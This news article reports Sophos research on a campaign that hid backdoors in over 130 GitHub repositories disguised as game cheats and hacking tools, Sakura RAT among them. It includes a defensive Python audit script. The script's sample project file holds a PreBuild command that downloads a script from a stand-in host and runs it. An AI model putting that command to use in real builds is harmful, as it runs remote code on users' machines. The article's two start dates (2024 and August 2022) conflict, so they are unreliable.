
Malicious traders: Cybercriminals deceive their peers with counterfeit malware and unlawful gaming enhancements

Continuing to seek malware and game cheats remains a constant danger due to potential security breaches and unsavory consequences.



In the cutthroat digital world, Sophos security researchers have exposed a major hacking scheme with an unusual twist: it goes after other hackers and gaming cheaters. The story came to light when a customer asked whether Sophos' security suite could protect against a piece of malware called Sakura RAT, found on GitHub and hyped for its "advanced evasion techniques."

Sophos quickly detected that Sakura RAT, for all its rumored greatness, is more of a dud for the average Joe; it's only dangerous to those concocting it or yearning to unleash it on unsuspecting victims. Essentially, it's a trojaned trojan!

A Coded Confusion

"In simple terms, Sakura RAT has been compromised," Sophos explains.

The Sakura RAT itself isn't particularly special, with most of its code swiped from a popular RAT called AsyncRAT. What's more, many of its components remain empty, ensuring it wouldn’t even boot up properly on the target device, like an under-seasoned souffle!

However, this Trojan was just the first course in a convoluted digital meal of deception, layered infection chains, and a series of backdoor variants. The mastermind (or minds) behind Sakura RAT, operating under the alias ischhfd83, churned out over a hundred backdoored malware variants, each crafted to ensnare naive would-be cybercriminals and gamers hunting for hacking tools or cheats.


In total, Sophos identified 141 GitHub repositories connected to ischhfd83, with a whopping 133 containing hidden backdoors. Most of these repositories were disguised as game cheats (58%), malware projects (24%), bots (7%), crypto tools (5%), or miscellaneous tools (6%).

The campaign seems to have first reared its head in 2024, and it appears to have been aimed at greenhorn threat actors: skilled players would likely run a new project through a sandbox before touching it. Sophos also found that the vast majority of commits and interactions on the repositories came from bot accounts with eerily similar names.

Attribution of the operation remains ambiguous, but Sophos confirmed that it was a success.


Behind the Scenes:

Sophos researchers discovered a massive operation involving over 100 backdoored GitHub projects created by a single threat actor profile, ischhfd83. Upon analyzing Sakura RAT, the team found it to be largely ineffectual and posed minimal risk to regular users. Instead, the project had been tampered with to specifically target individuals attempting to compile or distribute the code, primarily inexperienced cybercriminals and gamers searching for cheats or exploits.

The backdoor mechanism involved a Visual Studio PreBuild event that would download and execute malware on the machine of anyone who compiled the project, compromising would-be attackers' own systems. The ischhfd83 profile was found to be connected to at least 141 GitHub repositories, 133 of which were confirmed to contain hidden backdoors. These backdoors employed a variety of methods: obfuscated Python payloads, malicious screensaver (.scr) files utilizing Unicode tricks, and encoded JavaScript files. Many of these repositories were disguised as malware, hacking tools, or game cheats to trick users into unwittingly downloading and executing the harmful code.
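As an added example (not code from Sophos' research or from the campaign), the Python audit below scans a Visual Studio project file for build-time commands that fetch or run code, the PreBuild mechanism described above, and flags screensaver filenames that rely on Unicode bidi tricks. The project file and filenames are constructed samples, and the token watchlist is an assumption about what rarely belongs in a legitimate build step.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample project file (not from the campaign): a PreBuildEvent
# that fetches and runs a remote script whenever the project is built.
SAMPLE_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <PreBuildEvent>powershell -ep bypass -c "iwr http://example.invalid/p.ps1 | iex"</PreBuildEvent>
  </PropertyGroup>
  <Target Name="Stamp" BeforeTargets="Build">
    <Exec Command="echo building" />
  </Target>
</Project>"""

# Tokens that rarely belong in a legitimate build step: script interpreters,
# download utilities, in-memory execution helpers and remote URLs (assumed list).
SUSPICIOUS = re.compile(
    r"(powershell|pwsh|cmd\.exe|wscript|cscript|mshta|certutil|bitsadmin|curl|wget|"
    r"invoke-webrequest|iwr|downloadstring|downloadfile|invoke-expression|iex|"
    r"frombase64string|-enc|https?://)", re.IGNORECASE)

# Bidi control characters that can make "fdp.scr" render as "pdf" in a listing.
BIDI = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e", "\u2066", "\u2067", "\u2068", "\u2069"}

def _check(where, cmd):
    hits = sorted({m.lower() for m in SUSPICIOUS.findall(cmd)})
    return (where, cmd.strip(), hits) if hits else None

def audit_project(xml_text):
    """Return (location, command, matched tokens) for each build-time command on the watchlist."""
    root = ET.fromstring(xml_text)
    findings = []
    for el in root.iter():
        tag = el.tag.split("}")[-1]  # drop the MSBuild XML namespace if present
        if tag in ("PreBuildEvent", "PostBuildEvent") and el.text:
            findings.append(_check(tag, el.text))
        elif tag == "Exec" and el.get("Command"):
            findings.append(_check("Exec", el.get("Command")))
    return [f for f in findings if f]

def suspicious_filename(name):
    """Flag bidi override characters or a double extension that really ends in .scr."""
    reasons = []
    if any(ch in BIDI for ch in name):
        reasons.append("bidi-override")
    if name.lower().endswith(".scr") and name.count(".") > 1:
        reasons.append("double-extension-scr")
    return reasons
```

Run `audit_project` over every `.csproj`/`.vbproj` in a cloned repository before opening it in Visual Studio; a hit on `PreBuildEvent` means code runs at build time, before any binary is produced.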

The campaign has been ongoing since at least August 2022 and appears to prey on the inexperience of new threat actors and gaming cheaters, making use of the open-source platform's reputation to spread malware. Sophos reported their findings to GitHub, resulting in the takedown of most active repositories and malicious paste sites associated with the operation.

Cliff's Notes:

  • Damage: Over 100 backdoored GitHub projects linked to a single actor, ischhfd83.
  • Targets: Novice cybercriminals, hackers, game cheaters, and researchers seeking exploits or cheats.
  • Tricks: Visual Studio PreBuild events, obfuscated payloads, malicious screensaver files.
  • Threat: Remote access and infection of users who compile or execute the code.
  • Duration: Operation active since at least August 2022.
  • Action: Sophos reported findings to GitHub, resulting in takedown of most malicious content.

"Sophos researchers discovered that the malware known as Sakura RAT, although initially touted for its advanced capabilities, poses minimal risk to regular users. Instead, it's a targeted attack aimed at individuals compiling or distributing the code, often novice cybercriminals, hackers, and gaming cheaters."

"In the course of this operation, Sophos also observed the use of technology such as Visual Studio PreBuild events, obfuscated Python payloads, malicious screensaver files, and encoded JavaScript files, all hidden within repositories disguised as malware, hacking tools, or game cheats on GitHub."
